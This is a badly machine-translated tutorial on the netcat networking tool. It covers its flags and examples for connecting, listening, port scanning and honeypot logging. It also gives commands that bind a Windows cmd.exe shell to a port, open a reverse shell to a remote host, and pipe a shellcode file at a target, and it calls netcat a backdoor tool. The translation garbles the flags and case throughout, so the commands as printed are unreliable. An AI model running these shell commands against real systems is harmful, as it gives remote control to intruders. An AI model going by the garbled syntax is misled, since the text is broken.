Netcat How to use

Netcat is known as the ' Swiss Army knife ' of the cyber security community, believing that no one knows it ...
A simple and useful tool to read and write data through a network connection using TCP or UDP protocol. It was designed as a stable backdoor tool,
Can be easily driven directly by other programs and scripts. At the same time, it is also a powerful network debugging and probing tool, able to build the few you need
There are several interesting built-in features for all types of Internet connections (see below for details).
In China, its version of Windows has two versions, one is the original version written by Chris Wysopal, and the other is compiled by ' Red and black '
After the new ' condensed ' version. The ' condensed ' version of the main program is only more than 10 KB (10 KB of NC is not able to complete the 4th and 5th use of the method described below,
The original NC with this function seems to be 60kb:p), although the "volume" is small, but it has done a lot of work.
=====================================================================================================
Software Introduction:

Tool Name: Netcat
Hobbit && Chris Wysopal
Website: http://www.atstake.com/research/tools/network_utilities/
Category: Open source
Platform: linux/bsd/unix/windows
Version number under Windows: [v1.10 NT]

=====================================================================================================
Parameter description:

' Nc.exe-h ' can see how each parameter is used.
Basic format: NC [-options] hostname port[s] [ports] ...
Nc-l-P port [options] [hostname] [port]

-D Background mode
-e Prog program redirection, once connected, execute [Dangerous!!]
-G Gateway source-routing Hop Point[s], up to 8
-G num source-routing pointer:4, 8, 12, ...
-H Help Information
-I secs delay interval
-L listening mode for inbound connections
-L continues to listen after the connection is closed
-n Specifies the IP address of the number and cannot be used hostname
-O file record 16-binary transfer
-P port Local port number
-R random Local and remote ports
-S addr Local Source Address
-T using telnet interactive mode
-U UDP mode
-V Verbose output--with two-V for more detailed content
-W secs timeout time
-Z turns the input and output off-for scanning

The representation of a port can be written as a range format for m-n.


=====================================================================================================
Basic usage:

There are probably several uses:

1) Connect to remote host, example:
Format: NC-NVV 192.168.x.x 80
Explanation: Connecting to the TCP80 port of 192.168.x.x


2) Listen to the local host, example:
Format: nc-l-P 80
Explanation: Listen to the TCP80 port of this machine


3) Scan remote host, example:
Format: nc-nvv-w2-z 192.168.x.x 80-445
Explanation: Scan all ports of 192.168.x.x TCP80 to TCP445


4) remote host binding shell, example:
Format: nc-l-P 5354-t-e C:\winnt\system32\cmd.exe
Explanation: The Cmdshell of the remote host is bound to the TCP5354 port of the remote host


5) remote host bind shell and reverse connection, example:
Format: NC-T-e c:\winnt\system32\cmd.exe 192.168.x.x 5354
Explanation: Bind the remote host's Cmdshell and reverse connect to the 192.168.x.x TCP5354 port


These are some of the most basic uses (in fact, there are a lot of NC usage,
When the Mate Pipeline command "|" With the redirect command "<", ">" and so on command function more powerful ... ）。

=====================================================================================================
Advanced usage:

6) for attack applications, examples:
Format 1:type.exe C:\EXPLOIT.TXT|NC-NVV 192.168.x.x 80
Format 2:NC-NVV 192.168.x.x < C:\exploit.txt
Explanation: Connect to the 192.168.x.x 80 port and send the ' c:\exploit.txt ' content in its pipeline (two formats do have the same effect,
It's a similar idea: P)

Attached: ' C:\exploit.txt ' for shellcode, etc.


7) for honeypot use [1], Example:
Format: nc-l-P 80
Explanation: Use '-l ' (note L is uppercase) to continuously listen to a port until CTRL + C



8) for honeypot use [2], example:
Format: nc-l-p > C:\log.txt
Explanation: Use '-l ' can continuously listen to a port, until CTRL + C, and output the results to ' c:\log.txt ', if the ' > '
Change to ' >> ' to append log

Attached: ' C:\log.txt ' for logs, etc.


9) for honeypot use [3], Example:
Format 1:nc-l-P < C:\honeypot.txt
Format 2:type.exe c:\honeypot.txt|nc-l-P 80
Explanation: Use '-l ' can keep listening to a port until Ctrl + C, and ' send ' the contents of ' C:\honeypot.txt ' into its pipeline!

Netcat How to use